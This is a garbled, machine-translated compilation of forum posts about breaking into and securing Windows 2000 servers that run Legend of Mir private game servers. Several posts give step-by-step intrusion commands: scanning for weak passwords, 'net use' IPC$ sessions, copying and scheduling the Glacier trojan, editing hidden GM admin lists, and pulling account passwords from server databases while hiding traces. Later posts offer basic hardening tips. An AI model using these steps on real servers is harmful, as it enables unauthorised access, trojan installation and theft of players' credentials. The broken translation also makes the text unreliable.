A few days ago, this private server was also attacked by hackers! However, I have discovered the vulnerability several times!
Next I will first write how to intrude into the computer. I use WINDOWS 2000 SEVER.
1 X-SCAN scan IP to see who is weak password (IP is also very easy to get, private servers are there, weak password is the user name and password are the default system, did not change .)
2. Enable the DOS system!
C:/> net use \ 192.168.0.1 \ ipc $/user: the administrator enters the USER of the other computer as the administrator user.
After entering, you can find your own private server! Do GM or destroy or delete, for example, do GM!
C:/> copy \ 192.168.0.1 \ d $ \ mirserver \ mir200 \ envir \ adminlist.txt is a command. You can see that the rest of the ideas are yours, but I have to explain it !! The purpose of this Code is to copy a list of legendary GM disks. You can add yourself to the editing page!
C: \> edit \ 192.168.0.1 \ d $ \ mirserver \ mir200 \ envir \ adminlist.txt
In this way, you can. This is how to use a weak password to enter the computer !! Of course there are more methods.
I'm talking about my experiences with the legend of being hacked!
First, the mouse is moved, obviously being controlled. The analysis is as follows: 1. Moderate Trojan, 2 remote control!
Second, the computer was suddenly restarted when there was a file overwriting dialog box !! Analysis: 1. damage the system, 2. Control the legend! 3. The new boot is for the hacker's settings to take effect!
Again, an illegal GM manufactured item was found. The analysis is as follows: it is for legends!
Solution: Use anti-virus software to prevent viruses. It is best to do so under DOS! 2. There are too many vulnerabilities in 2000. Search for useless ports, close 3389, and download the 2000 SP3 patch! In the control panel, select a local user and a group to close the GUEST account! And IUSR (computer name) INTNERNET Guest account closed (my legend is that hackers use this number to enter the computer), modify the super administrator username and password! In the closed remote functions, in addition, the legend of the main is gmbench, I have the same sample, as this is the case, open the adminlist.txt file, did not find a lot of GM, the use of CTRL-A to see if there is no redundant GM, also carefully look at the AdminList. there is no space behind the TXT file name. If all the files are displayed, you will find that there is an additional GM list file hidden. This is also the reason why illegal GM is found repeatedly. it took two hours for a hacker to attack my computer and I found it. Then, I immediately modified it and resumed the normal operation of the legend. So far, there is still a warning that someone will enter my guest account, but it cannot be entered! Legend has entered the normal operation!
Face = Verdana> although I wrote some methods and solutions to attack and defend against computers, I also felt a bit self-contradictory, but my goal was very simple, hope to help you solve your problem! Improve the security of your computer
How to make GM in other users' private servers?
Attack Elementary Education
The method I used to intrude into the 4f of others
I saw that some 4f did a good job, but it was not very rich or equipped, and there were a lot of experts. I never liked to be a rookie in it, after a big fight on their servers. When gm's addiction is reached, I will publish my methods to everyone ....
In fact, the method I use is very simple. There are only four tools:
(1): shed.exe
(2) Traffic 2000
(33660000.exe (in fact, it is dos under 2000 )!
(4) Glacier 8.4 Operating System: win2000 server or winxp system. Mongoshed.exe ": it is actually used to query shared resources on the Internet. It is fast and can be used to find a lot of disconnected files. However, some ip addresses cannot be accessed in the browser, this is because it also contains the personal ip address used to access the Internet. haha! For some websites, some directories on the server of the Internet cafe are shared, and some of them are accessible but cannot be deleted. Because you access all directories anonymously, your permissions are insufficient! Some require passwords. What should I do if I encounter a password? Use streamer! Although "liuguang" imposes limits on 202, it does not limit the ip addresses in Japan! Therefore, we should use the stream-light ipc test to establish an empty conversation, check the user list, and then perform a simple test. Some network administrators are lazy at this time, and set the administrator too easily, you can catch it.
What should we do next? Maybe you find that there are few ports opened by the peer when you check the port of the peer. For example, if ftp is not opened, how can this problem be solved? Glaciers! "Glacier" may have been played by many friends. Using a glacier to control a server is very fast (because the server has a large bandwidth), you can find the home page of the host in a few minutes. But how to upload and control him? Cmd.exe "is the DOS in. Execute cmd.exe and use the net command,
The procedure is as follows:
Step 1: net use \ ip \ ipc $ "password"/user: "user" description: use a Super user Name to establish a connection with your desired website, of course, super users must be in the admin of the website. Here, "ip" is the host, "password" is the superuser password, and "user" is the superuser. For example: net use \ 210.248.250.2 \ ipc $ "maozhiie"/user: maozhijie
Step 2: copy g-server.exe \ ip \ admin $ \ system32 Description: g-server.exe is the remote server of the glacier. Meaning: copy the file to the system32 directory of the host winnt of the other party. Someone may ask the Trojan horse to intrude into the other side to detect it, huh, huh! You can install a firewall, but many hosts have no money to buy! Unlike Chinese piracy! If you have the latest Trojan! This is the best !! Hey hey ......
Step 3: Check the server time of the other party by net time \ ip. Due to the time difference, it should be an hour! Therefore, the server time of the other party must prevail.
Step 4: at \ ip time g-server.exe here time is the host time of the other party. Purpose: run the program at the specified time. For example at \ 210.248.250.2 g-server.exe Step 5: glaciers can control the computer. I won't talk about it anymore, huh, huh! Cainiao will also play with the software.
Now we can control the server,
Net use * \ ip \ * $ remote ing
Check this
The data of each person in the mir. db is not encrypted. You can use
Access to find out and change it to a few of the best, such as 0-80 attacking wooden swords, 0-50 magic hexagonal rings and so on, then you can easily. It's just annoying. Haha.
For example, the data format of a weapon is as follows (all in hexadecimal format)
* ****** Ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
The first ** is the item code, and 0xce 00 is the weapon code (after the high position), which corresponds to the item db database,
For example, in the item database, the serial number (idx) is 205, and the conversion from (205 + 1) to hexadecimal is ce.
The last 43 12 is the current durability, and the last 13 is the maximum durability.
For example, 43 12 is converted to 17170 in decimal format and the durability is 17.
The following 01 02 03 are attacks, magic, and Taoism in sequence.
Note that it is added on the basis of the original military.
For example, the above dragon slaughter shows attacks: 5-36, Taoism: 0-2, Magic: 0-3.
In turn, the following 04 05 06 07 09 shows the lucky, curse, accuracy, attack speed, and intensity of weapons.
0x0a followed by the remaining two vacancies indicates whether the weapon has been cultivated. Specifically
When adding an attack to a weapon:
Before practice: 00
After practice: 0a
After the test is successful: 00, the attack value increases.
For jewelry and clothes, study it by yourself. Many people know it. I didn't elaborate on it. There are some articles on the Internet, so I don't need to talk about them anymore?
Then go to mirserver \ mud2 \ logsrv \ iddb
Here is an id. the account and password of all db users are there. You can do it, but it's not a glorious thing to steal a person's house number. I never did it, I just often reload it with the gm number. Haha
Here, I will add you to the adminlist of this server while you are walking. Haha, here is an example, here is your name), and then we will go to mir. find the gm account in db, and then go to id. find the password of this account in db. Okay, okay. Use the gm to enter the game. (before you start, do not let people discover it, or change the password of others, haha ). Run @ reloadadmin. Get out immediately.
Then, delete the person you added to the adminlist from the adminlist. Now, go to the game. You are gm, but the real gm won't see your name on the server !! He might be thinking, "What's wrong here? There seems to be another gm ???". Oh, but don't go too far. Otherwise, people will lose your permission to reload your resources.
Now everyone has completed their gm dream. Next I will talk about how to remotely control the server host, such as shutting down the server and restarting it ····
I don't know about private server technology at all. But I still know a little about server security!
Server intrusion mainly relies on accounts and passwords. You must first understand what a system account is. What is the system password!
Every other WINDOWS system has its super Administrator account and password!
If these are scanned by hackers, you may be threatened!
When your private server is popular. If hackers intrude into the system, what if data is deleted. Then. It is really unbearable.
I. understand the meaning of the account
Run CMD first
Enter: net user (Press ENTER)
In this case, an account is displayed.
View the Administrator account
Input: net localgroup administrators
This is the user who views the administrators group. In this way, if you use a hidden account, you will find it!
The super administrator account that comes with the system is administrator
Remember that multiple accounts with unknown accounts are displayed here. Which proves that your machine is insecure. If your account appears, it is your own account. Which 40% your machine has not been intruded?
Account Security:
Ii. Password
If you think your account password is 123456, then someone else will go to your computer in less than three seconds.
Change the password to make it safer in DOS
Enter the net user account name and change the password (then press Enter)
The password is generally a little more complex!
Overflow:
If the server version 2000 is installed, IIS will be automatically installed. If you feel that IIS is useless, it will be stopped. IIS address: Start, program, Administrative Tools, Internet Information Service (this is IIS). You can enable it. Click Stop above! This further improves security. However, if you need to use IIS, remember to use the latest patch SP4.
RPC Overflow. Remember, try telnet IP 135 to see if it is on. If it is on. Install the RPC patch. If not. Simply install a firewall to shield the 135 terminals!
Everyone must remember. Account and password are the most critical points for system intrusion. Protect your account and password. Security must belong to you!
Intrusion into legendary private servers/act as illegal GM
First of all, I have to declare that I am writing this article not to teach everyone how to go to the Black 4f. I just want to use this article to attract the attention of the majority of 4f owners and improve their network management level.
I love playing games, but I have a good experience and I don't have time to play games. I just want to have fun. So when I started playing legends, I thought it was fun, however, it is simply a sin to play the grand game. The upgrade is slow, the equipment is not good, and people are bullied everywhere. Therefore, 4f is a wise choice, but it is not equipped and bullied when I enter. Can't I do gm? Try folling me!
Find a bunch of 4f ip addresses and open an x-scan. There are a lot of weak passwords.
Select one, 192.168.0.1, go!
Open cmd,
1) c:/> net use 192.168.0.1ipc $/user: administrator
Connection successful,
OK, connected. Hope to succeed,
2) c:/> copy 192.168.0.1d1_mirservermir200enviradminlist.txt
The system cannot find the specified file.
No? Impossible? Well, it must be hidden. It's okay. Come back,
3) c:> attrib-r-h 192.168.0.1d1_mirservermir200enviradminlist.txt
No prompt, succeeded,
This time we don't need to copy it. Let's just change it,
4) c:> edit 192.168.0.1d1_mirservermir200enviradminlist.txt
An interface will be opened to see which gm is in it. Add one. Just remember it. Save it and exit.
5) c:> attrib + r + h 192.168.0.1d1_mirservermir200enviradminlist.txt
Restores adminilist.txt to read-only hiding,
All right, you're done. Clean up the footprints. Don't let people discover the intrusion,
Now, wait for the system to restart. If you cannot wait, restart the system in step 5. However, this is too dangerous. Please wait,
Register an account the next day and create a new name,
/Who
Currently 150 online users
Ha, I am gm. Upgrade Yourself,
@ Level-1
Upgrade successful, level 1, haha
Create the desired equipment and create whatever you want,
I deleted the token from adminlist.txt again. Haha, I got the necessary equipment and can play it.
I remember a friend who gave a series of instructions on how to enhance server security, but I think there are a lot to add. microsoft's system is famous for its vulnerabilities and patches. It is really difficult to configure the server security, and there are too many considerations.
Let's talk about one thing today, which is a further supplement to our friends!
The previous friend outlined the security settings for weak WIN2000 passwords! He has already made it very careful. The password is almost the same. in the Internet era, passwords are really important. I have carried out a series of tests on hosts outside China. There are still many systems with weak passwords! It also includes a lot of small and medium enterprises WEB servers, E-MAIL, PROXY servers are such a low-level error!
If you do this very carefully, but at least you need to take a closer look at what services are running on your host. What do these services represent? You should be very clear! Nowadays, most hacker software, Trojan tools, and remote control software run in the form of a service in your server system. The general firewall and anti-virus software do not reflect it. control tools in service form. it is rare to find out which services you must run on the server are very familiar. set security for unfamiliar or strange services.
The following is a brief description of the security configuration of the WIN2000 WWW (IIS) server. The WWW Service is installed by default on WIN2000SERVER, ADSERVER, and DATACENTERSERVER, if you do not need the 2000 WWW Service, we recommend that you do not install it. to add/delete a web service, you can remove its installation from the control panel, or set the word wide web service Startup type to manual/disabled in Administrative Tools/services.
In this case, the system will not start the service change by default!
If you need to use IIS to build your own private server, you must configure IIS in the following ways,
In the IIS component, you must first remove the SMTP, SNNP, and FTP that you do not need. In this way, you can reduce the CPU resources and memory usage occupied by your server. we recommend that you delete all the contents in your C: \ INTERPUB \ directory! Or change the path. delete the default site in the IIS Manager (or delete the virtual directory SCRIPTS) because the directory has the write permission. in the new WEB site, set the IIS permission so that it cannot be written or run. because IIS supports ASP scripts by default. it is important to delete unnecessary mappings in IIS. if you want to support PHP and CGI scripts, You have to configure PHP. correct CGI ing of CGI applications, disabling or deleting FSO components (last year, the window in Shenzhen was hacked by people using FSO ......) if you want to use FSO, you 'd better rename it! Otherwise, you will be hacked if you provide the homepage for others to upload. Be careful!
At present, hackers exploit the IIS vulnerability to escalate their permissions and become an AD in an Internet space where hackers are rampant. This is just a breeze, it does not take a few days to crack the password. For example, the number of self-built WEB servers is not enough. there are too many articles about how to use the UNICODE vulnerability to provide AD permissions on the Internet.
These should be an example of server security prevention. It takes a lot of time to figure out how to implement secure server operation. for these reasons, it is enough to deal with some boring ..... of course, if you need a WEB server, I suggest you use the AP. its source code development is free of charge, and its security and stability are much better than those of IIS.